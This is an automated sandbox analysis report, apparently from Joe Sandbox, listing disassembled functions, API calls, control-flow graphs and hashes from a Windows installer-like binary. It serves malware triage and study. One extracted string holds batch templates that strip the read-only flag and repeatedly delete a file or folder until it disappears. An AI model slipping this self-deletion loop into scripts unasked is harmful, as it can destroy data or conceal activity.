                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Init_thread_footer$AddressProc$CriticalSection$ConditionDirectoryEnterFileHandleHeapLeaveModuleMoveProcessSystemVariableWake
                                                                                                                                                                        • String ID: @;$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try del "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try rd "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1rd "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r "$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1del "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r "$SetDefaultDllDirectories$SetDllDirectory$SetSearchPathMode$kernel32$kernel32.dll
                                                                                                                                                                        • API String ID: 3437638698-1173364965
                                                                                                                                                                        • Opcode ID: a22f1f4c1e316a8d3cac47842324794cf6d98a2c58185fdc23c92069bdf3e312
                                                                                                                                                                        • Instruction ID: ac755fc1865096e2c5066e4c3c2d49f934ce6afefd83a1ad33876d9b967dcdfc
                                                                                                                                                                        • Opcode Fuzzy Hash: a22f1f4c1e316a8d3cac47842324794cf6d98a2c58185fdc23c92069bdf3e312
                                                                                                                                                                        • Instruction Fuzzy Hash: 85E15DB0901258DFDB20DF54E94ABDEBBB4FF55314F10511AE914BB392DBB09A08CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CE7FC0 Relevance: 28.8, APIs: 3, Strings: 13, Instructions: 784COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BBAB90: GetProcessHeap.KERNEL32 ref: 00BBABE5
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBAC17
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBACA2
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?), ref: 00CE8094
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 00CE80C8
                                                                                                                                                                          • Part of subcall function 00BBA140: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,00000000,00BBA2B8,-00000010,?,00000000), ref: 00BBA163
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharInit_thread_footerMultiWide$FindHeapProcessResource
                                                                                                                                                                        • String ID: %hu$A valid language was received from commnad line. This is:$AI_BOOTSTRAPPERLANGS$Advinst_Extract_$Code returned to Windows by setup:$Language of a related product is:$Language selected programatically for UI:$Language used for UI:$Languages of setup:$P$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\$Software\Caphyon\Advanced Installer\$a
                                                                                                                                                                        • API String ID: 1419962739-476803854
                                                                                                                                                                        • Opcode ID: 5d1b16f6eb372637ef5817b51968c25911f13b6e66a41eb26aaec9ea23ad7dbf
                                                                                                                                                                        • Instruction ID: 48644589e1af901fb2060609c2134ff57901ec97270b2c3b69389d0ed4ae79e9
                                                                                                                                                                        • Opcode Fuzzy Hash: 5d1b16f6eb372637ef5817b51968c25911f13b6e66a41eb26aaec9ea23ad7dbf
                                                                                                                                                                        • Instruction Fuzzy Hash: 6C52F6709006899FDB10DBA9CC45BEEB7B4EF05310F1481ADE929A72D2DF709E08CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CE7C80 Relevance: 25.5, APIs: 10, Strings: 4, Instructions: 1034threadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetActiveWindow.USER32 ref: 00CE7E50
                                                                                                                                                                        • SetLastError.KERNEL32(0000000E), ref: 00CE7E6D
                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00CE7E85
                                                                                                                                                                        • EnterCriticalSection.KERNEL32(00E9E7BC), ref: 00CE7EA2
                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00E9E7BC), ref: 00CE7EC5
                                                                                                                                                                        • DialogBoxParamW.USER32(000007D0,00000000,00C28D40,00000000), ref: 00CE7EE2
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?), ref: 00CE8094
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 00CE80C8
                                                                                                                                                                          • Part of subcall function 00CB6270: MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,?,00000000,?,00000000,00DB225D,000000FF,?,80004005,?,?), ref: 00CB6288
                                                                                                                                                                          • Part of subcall function 00CB6270: MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,?,-00000001,?,80004005,?,?,?,00000000,00DE48ED,000000FF,?,00CB4B55), ref: 00CB62BA
                                                                                                                                                                        • SetEvent.KERNEL32(?,?,00000000,?,00000001,?,?), ref: 00CE8299
                                                                                                                                                                        • SetEvent.KERNEL32(?,00000000,?,?), ref: 00CE834F
                                                                                                                                                                          • Part of subcall function 00BBAB90: GetProcessHeap.KERNEL32 ref: 00BBABE5
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBAC17
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBACA2
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharMultiWide$CriticalEventInit_thread_footerSection$ActiveCurrentDialogEnterErrorHeapLastLeaveParamProcessThreadWindow
                                                                                                                                                                        • String ID: Advinst_Extract_$Code returned to Windows by setup:$FILES.7z$P^
                                                                                                                                                                        • API String ID: 1170959282-842124583
                                                                                                                                                                        • Opcode ID: 4025d806d42cbb9797fd66fc089939550b76a7fc22673b583bdab971001cb760
                                                                                                                                                                        • Instruction ID: e762d3012ebd280cd53e32a586a170f29ec5be4090f6732674750bc97059a967
                                                                                                                                                                        • Opcode Fuzzy Hash: 4025d806d42cbb9797fd66fc089939550b76a7fc22673b583bdab971001cb760
                                                                                                                                                                        • Instruction Fuzzy Hash: B792C330900249DFDB10DFA9CC49BEEB7B4EF45314F148299E519AB292DB749E48CFA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CF5ED0 Relevance: 18.2, APIs: 12, Instructions: 179threadCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 2211 cf5ed0-cf5f01 2212 cf5f07-cf5f21 GetActiveWindow 2211->2212 2213 cf60c6-cf60d7 2211->2213 2214 cf5f2f-cf5f37 2212->2214 2215 cf5f23-cf5f25 call cee3f0 2212->2215 2217 cf5f39-cf5f43 call d7fa13 2214->2217 2218 cf5f52-cf5f61 call d7fb15 2214->2218 2219 cf5f2a KiUserCallbackDispatcher 2215->2219 2217->2218 2226 cf5f45-cf5f4d SetLastError 2217->2226 2224 cf60ef-cf60f6 call bc8f60 2218->2224 2225 cf5f67-cf5fcc GetCurrentThreadId EnterCriticalSection LeaveCriticalSection CreateDialogParamW 2218->2225 2219->2214 2229 cf60fb-cf6105 call bba850 2224->2229 2228 cf5fd2-cf5fe9 GetCurrentThreadId 2225->2228 2226->2228 2232 cf604e 2228->2232 2233 cf5feb-cf5ff2 2228->2233 2234 cf6051-cf6079 SetWindowTextW GetDlgItem SetWindowTextW 2232->2234 2236 cf6005-cf6042 call cd0180 call bb9bb0 2233->2236 2237 cf5ff4-cf6000 call bd1a90 call cd7070 2233->2237 2234->2213 2238 cf607b-cf6084 call bbab90 2234->2238 2236->2234 2249 cf6044-cf604c 2236->2249 2237->2236 2238->2229 2247 cf6086-cf60a8 call bba140 2238->2247 2254 cf60da-cf60ed GetDlgItem SetWindowTextW 2247->2254 2255 cf60aa-cf60bc 2247->2255 2249->2234 2254->2255 2255->2213 2256 cf60be-cf60c1 2255->2256 2256->2213
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetActiveWindow.USER32 ref: 00CF5F0A
                                                                                                                                                                        • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?), ref: 00CF5F47
                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00CF5FD2
                                                                                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 00CF605C
                                                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00CF6066
                                                                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00CF6072
                                                                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00CF60DF
                                                                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00CF60E7
                                                                                                                                                                          • Part of subcall function 00CEE3F0: GetDlgItem.USER32(?,00000002), ref: 00CEE410
                                                                                                                                                                          • Part of subcall function 00CEE3F0: GetWindowRect.USER32(00000000,?), ref: 00CEE426
                                                                                                                                                                          • Part of subcall function 00CEE3F0: ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,00CF5F2A,?,?,?,?,?,?), ref: 00CEE43F
                                                                                                                                                                          • Part of subcall function 00CEE3F0: InvalidateRect.USER32(00000000,00000000,00000001,?,?,?,?,?,?,?,00CF5F2A,?,?), ref: 00CEE44A
                                                                                                                                                                          • Part of subcall function 00CEE3F0: GetDlgItem.USER32(00000000,000003E9), ref: 00CEE45C
                                                                                                                                                                          • Part of subcall function 00CEE3F0: GetWindowRect.USER32(00000000,?), ref: 00CEE472
                                                                                                                                                                          • Part of subcall function 00CEE3F0: SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000206,?,?,?,?,?,?,?,00CF5F2A), ref: 00CEE4B5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$Item$RectText$ActiveCurrentErrorInvalidateLastShowThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 127311041-0
                                                                                                                                                                        • Opcode ID: 91bbc267c127fcc2e969e53159ffaacd3c401931776805e4c1656967e6e08675
                                                                                                                                                                        • Instruction ID: 8976f649ca0e03318669b9928999cf45dab6f1476bf5465a37684aa028f261fb
                                                                                                                                                                        • Opcode Fuzzy Hash: 91bbc267c127fcc2e969e53159ffaacd3c401931776805e4c1656967e6e08675
                                                                                                                                                                        • Instruction Fuzzy Hash: 7C61C531500604EFDB21DF69CD48B59BBB4FF04320F14825AFA65AB2E1DB71A948CF92
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D7F7A5 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58libraryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 2257 d7f7a5-d7f7b0 2258 d7f7b2-d7f7be RtlDecodePointer 2257->2258 2259 d7f7bf-d7f7d6 LoadLibraryExA 2257->2259 2260 d7f850 2259->2260 2261 d7f7d8-d7f7e3 call d7f855 2259->2261 2262 d7f852-d7f854 2260->2262 2264 d7f7e8-d7f7ed 2261->2264 2264->2260 2265 d7f7ef-d7f804 call d7f855 2264->2265 2265->2260 2268 d7f806-d7f81b call d7f855 2265->2268 2268->2260 2271 d7f81d-d7f832 call d7f855 2268->2271 2271->2260 2274 d7f834-d7f84e DecodePointer 2271->2274 2274->2262
                                                                                                                                                                        APIs
                                                                                                                                                                        • RtlDecodePointer.NTDLL(?,00000000,?,00D7FB44,00E97D7C,?,00000000,?,00CF5F5C,?,00000000,00000000,?,?), ref: 00D7F7B7
                                                                                                                                                                        • LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,00000000,?,00D7FB44,00E97D7C,?,00000000,?,00CF5F5C,?,00000000,00000000), ref: 00D7F7CC
                                                                                                                                                                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D7F848
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DecodePointer$LibraryLoad
                                                                                                                                                                        • String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
                                                                                                                                                                        • API String ID: 1423960858-1745123996
                                                                                                                                                                        • Opcode ID: 8a6b69309915b2b96bcee8ca720aa69ec1abcb52af3902862f4766a6bfeb9c48
                                                                                                                                                                        • Instruction ID: 8cff2e4cbe58c06ee3c056396f3436cefaf8731fae788cc559d4db6eb1b40b7a
                                                                                                                                                                        • Opcode Fuzzy Hash: 8a6b69309915b2b96bcee8ca720aa69ec1abcb52af3902862f4766a6bfeb9c48
                                                                                                                                                                        • Instruction Fuzzy Hash: 33019BB15543016BDB255B109D43FD937948F02748F085074BC8D772E3F661954DC1BB
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CCA1C0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 249registrylibraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 2275 cca1c0-cca282 call bb7690 call cca8e0 2280 cca284-cca2ae call bb8810 2275->2280 2281 cca2b1-cca2bb 2275->2281 2280->2281 2282 cca2bd-cca2cf 2281->2282 2283 cca2ef-cca308 2281->2283 2285 cca2e5-cca2ec call d7fe78 2282->2285 2286 cca2d1-cca2df 2282->2286 2287 cca30e-cca314 2283->2287 2288 cca3c7-cca3e5 2283->2288 2285->2283 2286->2285 2290 cca4ac-cca4b1 call d852ff 2286->2290 2292 cca318-cca31e 2287->2292 2293 cca316 2287->2293 2294 cca3e9-cca3f8 2288->2294 2295 cca3e7 2288->2295 2300 cca33c-cca34e call bb7690 2292->2300 2301 cca320-cca33a call bb80d0 2292->2301 2293->2292 2296 cca43d-cca449 RegOpenKeyExW 2294->2296 2297 cca3fa-cca3fd 2294->2297 2295->2294 2305 cca44f-cca454 2296->2305 2302 cca3ff-cca40c GetModuleHandleW 2297->2302 2303 cca437-cca43b 2297->2303 2317 cca353-cca375 call bb9bd0 2300->2317 2301->2317 2308 cca40e-cca41e GetProcAddress 2302->2308 2309 cca480 2302->2309 2303->2296 2303->2309 2310 cca456-cca45a 2305->2310 2311 cca483-cca4a9 call d7fe6a 2305->2311 2308->2309 2314 cca420-cca435 2308->2314 2309->2311 2315 cca45c-cca463 RegCloseKey 2310->2315 2316 cca469-cca47e 2310->2316 2314->2305 2315->2316 2316->2311 2323 cca379-cca39b call bb8060 call bb8810 2317->2323 2324 cca377 2317->2324 2329 cca39d-cca3ab call bb8810 2323->2329 2330 cca3ae-cca3b7 2323->2330 2324->2323 2329->2330 2330->2288 2332 cca3b9-cca3c2 call bb8810 2330->2332 2332->2288
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(Advapi32.dll,00000000,1FC3D414), ref: 00CCA404
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 00CCA414
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00CCA45D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressCloseHandleModuleProc
                                                                                                                                                                        • String ID: <;$Advapi32.dll$RegOpenKeyTransactedW
                                                                                                                                                                        • API String ID: 4190037839-135955970
                                                                                                                                                                        • Opcode ID: 7f7d7f35b93b49f5154b15147cd329219da47278c978345a3b5c5c7a098e27a6
                                                                                                                                                                        • Instruction ID: 8d5befc278da1962642fbfec360ca9ee7a72989fc3b96c122233eaf120bb2cab
                                                                                                                                                                        • Opcode Fuzzy Hash: 7f7d7f35b93b49f5154b15147cd329219da47278c978345a3b5c5c7a098e27a6
                                                                                                                                                                        • Instruction Fuzzy Hash: 35A16AB0D00308DFDB14DFA8C859BAEBBF4BF48304F14865DE415AB291DB74AA44CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CCCF10 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 234COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 2335 cccf10-cccf43 call ccc960 2338 cccf59-cccf92 PathIsUNCW call cccb90 2335->2338 2339 cccf45-cccf58 2335->2339 2342 cccf98-cccfc8 call bba380 2338->2342 2343 ccd121-ccd18a call bba850 CreateFileW 2338->2343 2350 cccfce 2342->2350 2351 ccd072-ccd08e 2342->2351 2348 ccd18c-ccd198 GetFileSize 2343->2348 2349 ccd1a0 2343->2349 2348->2349 2354 ccd19a-ccd19e 2348->2354 2355 ccd1a2-ccd1b2 2349->2355 2356 cccfd0-cccff3 call bba380 call bd11b0 2350->2356 2352 ccd098-ccd0ba call cb6ea0 2351->2352 2353 ccd090-ccd093 2351->2353 2353->2352 2354->2355 2358 ccd1b4-ccd1bb CloseHandle 2355->2358 2359 ccd1c2-ccd1d5 2355->2359 2356->2343 2365 cccff9-cccffc 2356->2365 2358->2359 2365->2343 2366 ccd002-ccd022 call bd11b0 CreateDirectoryW 2365->2366 2369 ccd028-ccd036 GetLastError 2366->2369 2370 ccd0bb-ccd0c0 2366->2370 2371 ccd0cd-ccd0df call bd11b0 2369->2371 2373 ccd03c-ccd040 2369->2373 2370->2371 2372 ccd0c2-ccd0c8 call ccaaa0 2370->2372 2371->2343 2381 ccd0e1-ccd105 call bd11b0 2371->2381 2372->2371 2373->2371 2375 ccd046-ccd049 2373->2375 2377 ccd04b-ccd04e call ccc5d0 2375->2377 2378 ccd053-ccd065 2375->2378 2377->2378 2382 ccd06f 2378->2382 2383 ccd067-ccd06a 2378->2383 2386 ccd10f-ccd116 2381->2386 2387 ccd107-ccd10a 2381->2387 2382->2351 2383->2382 2386->2382 2388 ccd11c 2386->2388 2387->2386 2388->2356
                                                                                                                                                                        APIs
                                                                                                                                                                        • PathIsUNCW.SHLWAPI(?,1FC3D414,?,?,?), ref: 00CCCF5B
                                                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00E23B3C,00000001,?,?,?,?,?,00DA842D,000000FF,?,8000000B), ref: 00CCD01A
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,00DA842D,000000FF,?,8000000B), ref: 00CCD028
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateDirectoryErrorLastPath
                                                                                                                                                                        • String ID: <3
                                                                                                                                                                        • API String ID: 953296794-878583566
                                                                                                                                                                        • Opcode ID: 5e9f284875d6b6d7045d79d23f0442079c0768306ecb95ec648d5efcfe6d9676
                                                                                                                                                                        • Instruction ID: 50000e55d8dcb30e6c79b98944a55ede5c086e3eed1a1c46a3e163173385671a
                                                                                                                                                                        • Opcode Fuzzy Hash: 5e9f284875d6b6d7045d79d23f0442079c0768306ecb95ec648d5efcfe6d9676
                                                                                                                                                                        • Instruction Fuzzy Hash: 5581B231A006099FDB10DFA8C885F9DFBF4EF05320F14426AE925A72D0DB759A49CB50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CF6110 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 69threadsynchronizationCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 2389 cf6110-cf6198 CreateThread 2390 cf619a-cf61a0 GetLastError 2389->2390 2391 cf61a3-cf61a5 call ccd7e0 2389->2391 2390->2391 2393 cf61aa-cf61bd 2391->2393 2394 cf61bf-cf61cd WaitForSingleObject 2393->2394 2395 cf6204-cf6212 2393->2395 2396 cf61cf-cf61e5 GetExitCodeThread 2394->2396 2397 cf61fb-cf61fe CloseHandle 2394->2397 2396->2397 2398 cf61e7-cf61ee 2396->2398 2397->2395 2398->2397 2399 cf61f0-cf61f5 TerminateThread 2398->2399 2399->2397
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateThread.KERNEL32 ref: 00CF618D
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00CF619A
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,FFFFFFFF), ref: 00CF61C3
                                                                                                                                                                        • GetExitCodeThread.KERNEL32(00000000,?), ref: 00CF61DD
                                                                                                                                                                        • TerminateThread.KERNEL32(00000000,00000000), ref: 00CF61F5
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00CF61FE
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Thread$CloseCodeCreateErrorExitHandleLastObjectSingleTerminateWait
                                                                                                                                                                        • String ID: <s
                                                                                                                                                                        • API String ID: 1566822279-2940880691
                                                                                                                                                                        • Opcode ID: 748dc2367d6292bd1d0ee4f497083e7c9ed967caf3de7999972904a409c39ab0
                                                                                                                                                                        • Instruction ID: a04c6cded75f8569c5a7c54e10f5a6bf1c2721dbfd551df253ab05b63ce4fa62
                                                                                                                                                                        • Opcode Fuzzy Hash: 748dc2367d6292bd1d0ee4f497083e7c9ed967caf3de7999972904a409c39ab0
